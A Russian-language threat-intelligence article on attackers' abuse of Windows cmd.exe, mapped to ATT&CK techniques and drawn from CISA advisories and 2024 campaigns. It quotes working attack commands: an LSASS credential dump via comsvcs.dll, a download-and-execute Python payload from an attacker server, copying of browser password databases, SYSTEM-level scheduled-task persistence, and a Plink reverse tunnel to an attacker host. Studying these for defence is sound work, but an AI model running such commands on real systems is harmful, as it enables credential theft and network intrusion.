Командная строка Windows, известная как cmd.exe или cmd, является основным приложением, встроенным в операционную систему Windows. Возможно, она не обладает расширенными возможностями PowerShell, но остается инструментом, часто используемым злоумышленниками для выполнения различных вредоносных действий. К таким действиям относятся запуск произвольных сценариев, обход мер безопасности и содействие латеральным перемещениям в сетях.
Cmd особенно искусен в создании и управлении пакетными сценариями, сохраненными в виде файлов .bat или .cmd. Эти пакетные файлы представляют собой текстовые документы, содержащие ряд команд для cmd.exe. При выполнении они автоматизируют сложные и повторяющиеся задачи, такие как управление учетными записями пользователей или выполнение систематического ночного резервного копирования. Эта функциональность, хотя и полезна для законного использования, открывает двери для злоумышленников.
- Использование злоумышленниками командной оболочки Windows
- Сброс учетных данных (T1003.001)
- Загрузка и выполнение программ для кражи информации
- Получение доступа к конфиденциальным данным
- Команда Firefox
- Команда Chrome
- Обнаружение и сохранение информации с помощью запланированных задач
- Туннелирование протоколов (T1572) и Прокси соединения: Внешний прокси (T1090.003)
Использование злоумышленниками командной оболочки Windows
Злоумышленники часто эксплуатируют cmd.exe в Windows, используя его с параметром /c, за которым следует определенная опция, как в cmd.exe /c <option>. Параметр /c предписывает командной оболочке выполнить команду, указанную в последующей строке. После выполнения указанной команды оболочка автоматически завершается.
Сброс учетных данных (T1003.001)
В ноябре 2024 года в информационном бюллетене CISA было подробно описано, как угрожающие лица из BianLian использовали команду для сброса учетных данных из службы Local Security Authority Subsystem Service (lsass.exe). Используя cmd.exe, злоумышленники создали вредоносную команду, которая использовала легитимные системные утилиты для извлечения конфиденциальной информации.
Вот конкретная использованная команда:
| 1 | cmd.exe /Q /c for /f "tokens=1,2 delims= "^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\<file>.csv full |
Эта команда сначала определяет идентификатор процесса (PID) lsass.exe с помощью списка задач и фильтрует его с помощью утилиты find. Затем она вызывает rundll32.exe для вызова comsvcs.dll и создания минидампа lsass.exe, сохраняя дамп в виде CSV-файла в указанном каталоге. Дизайн команды является преднамеренным и использует способность rundll32.exe и comsvcs.dll работать как легитимные инструменты Windows. Это позволяет злоумышленникам генерировать дампы памяти, содержащие конфиденциальные учетные данные, не вызывая немедленных подозрений.
Загрузка и выполнение программ для кражи информации
Злоумышленники часто используют командную оболочку Windows для доставки и выполнения вредоносной полезной нагрузки во взломанных средах. В ноябре 2024 года исследователи безопасности заметили появление новой угрозы - новой версии PXA Infostealer, активно распространяемой в дикой природе.
Один из примеров ее развертывания заключался в выполнении следующей команды:
| 1 | cmd.exe /c start /min C:\Users\Public\oZHyMUy4qk\synaptics.exe -c import urllib[.]request;import base64;exec(base64.b64decode(urllib[.]request[.]urlopen('hxxps[://]tvdseo[.]com/file/PXA/PXA_BOT').read().decode('utf-8'))) |
Эта команда использует команду start с флагом /min для запуска вредоносной полезной нагрузки, synaptics.exe, в свернутом окне, что снижает вероятность обнаружения пользователем. Затем полезная нагрузка выполняет сценарий Python, встроенный в команду.
Сценарий работает в три этапа:
- Загрузка сценария: Получает скрипт в base64-кодировке с сервера злоумышленника (hxxps[://]tvdseo[.]com/file/PXA/PXA_BOT) с помощью библиотеки urllib.request.
- Декодирование: Скрипт декодирует полученное содержимое в base64-кодировке.
- Выполнение: Наконец, он выполняет декодированный скрипт, инициируя работу PXA-крада.
Этот метод позволяет злоумышленнику доставлять и исполнять сложные компоненты вредоносного ПО, маскируя вредоносную активность за легитимными системными утилитами.
Получение доступа к конфиденциальным данным
Злоумышленники часто используют встроенные инструменты для получения доступа к конфиденциальным данным в скомпрометированных средах. В апреле 2024 года в рекомендациях CISA было подробно описано, как группа вымогателей Akira использовала системные команды для извлечения пользовательских данных, хранящихся в веб-браузерах, таких как Firefox и Chrome. Использовались следующие команды:
| 1 2 3 4 5 6 7 | # для Firefox cmd.exe /Q /c esentutl.exe /y "C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db" /d # для Chrome cmd.exe /Q /c esentutl.exe /y "C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d "C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp" |
В этих командах злоумышленники использовали esentutl.exe, легитимный инструмент восстановления баз данных, встроенный в Windows, для копирования файлов баз данных, содержащих конфиденциальные пользовательские данные.
Команда Firefox
Команда получает доступ к key4.db, файлу базы данных, используемому Firefox для хранения зашифрованных учетных данных, расположенному в каталоге профиля пользователя Firefox. В этом файле хранится зашифрованная информация для входа в систему, которую злоумышленники могут расшифровать в автономном режиме.
Команда Chrome
Аналогично, эта команда нацелена на файл Login Data в Chrome, который содержит зашифрованные пароли, сохраненные в браузере. Злоумышленники не только получают доступ к этому файлу, но и создают его копию в формате .tmp для возможного манипулирования или расшифровки в автономном режиме.
Обнаружение и сохранение информации с помощью запланированных задач
Программа Interlock ransomware, обнаруженная в ноябре 2024 года, демонстрирует продуманный и многогранный подход к использованию утилит командной строки во вредоносных целях. Среди команд, выполняемых инструментом удаленного доступа (RAT), встроенным в поддельную программу обновления браузера Chrome, можно выделить следующие:
| 1 | cmd.exe /c systeminfo |
Эта команда собирает подробную информацию о системе, такую как конфигурация ОС, статистика физической и виртуальной памяти, а также сетевые данные. Собранные данные шифруются и передаются на сервер C2 для дальнейшей эксплуатации. Кроме того, злоумышленники используют сценарии PowerShell для развертывания двоичных файлов для кражи учетных данных и кейлоггинга, что расширяет их возможности по эксфильтрации данных.
Для поддержания устойчивости ransomware также использует утилиту schtasks:
| 1 | schtasks /create /sc DAILY /tn "TaskSystem" /tr "cmd /c cd "$Путь к бинарному файлу" && "$command"" /st 20:00 /ru system > nul |
Эта задача обеспечивает ежедневный запуск программы-вымогателя от имени пользователя SYSTEM, укрепляя ее позиции в сети жертвы. Используя эти команды наряду с такими тактиками, как латеральное перемещение через RDP и AnyDesk, злоумышленники демонстрируют сложную стратегию, которая подчеркивает необходимость надежной защиты конечных точек и бдительного мониторинга действий в командной строке.
Туннелирование протоколов (T1572) и Прокси соединения: Внешний прокси (T1090.003)
Группа UAT-5647, обнаруженная в октябре 2024 года, нацелена на украинские и польские организации и использует такие современные вредоносные программы, как RustClaw, DustyHammock и ShadyHammock, используя утилиты командной строки для разведки систем, латерального перемещения и эксфильтрации данных.
Важнейшей тактикой является туннелирование внутренних систем к контролируемым злоумышленниками конечным точкам с помощью утилиты Plink из PuTTY, как показано в следующей команде:
| 1 | cmd /C %public%\pictures\iestatus[.]exe -pw _passwd_ -batch -hostkey SHA256:_KEY_ -N -R 8080:_IP_В_ЗАРАЖЕННОЙ_СЕТИ_:80 root@_IP_АДРЕСС_АТАКУЮЩИХ_ -P 7722 |
Эта команда эффективно перенаправляет внутренние порты на внешние серверы, позволяя злоумышленникам обойти традиционные средства защиты сети. Открывая внутренние сервисы через перенаправление портов, UAT-5647 может перебирать учетные данные, отслеживать сетевой трафик или выводить конфиденциальные конфигурации из взломанной инфраструктуры.
Проникнув в сеть, злоумышленники переключают свое внимание на разведку. Используя PowerShell, они проводят ping, чтобы выявить активные системы в окружении жертвы:
| 1 | 1..254 | % {ping n 1 a w 100 192.168.0.$_} | Select-String "\[" |
Этот метод сканирования позволяет злоумышленникам выявлять живые узлы и определять приоритетность целей. После этого они запускают специальные пакетные файлы, такие как nv.bat, для перечисления общих сетевых ресурсов и определения доступных ресурсов:
| 1 | net view /all \\192.168.XXX.XXX |
Определив цели, UAT-5647 приступает к извлечению данных.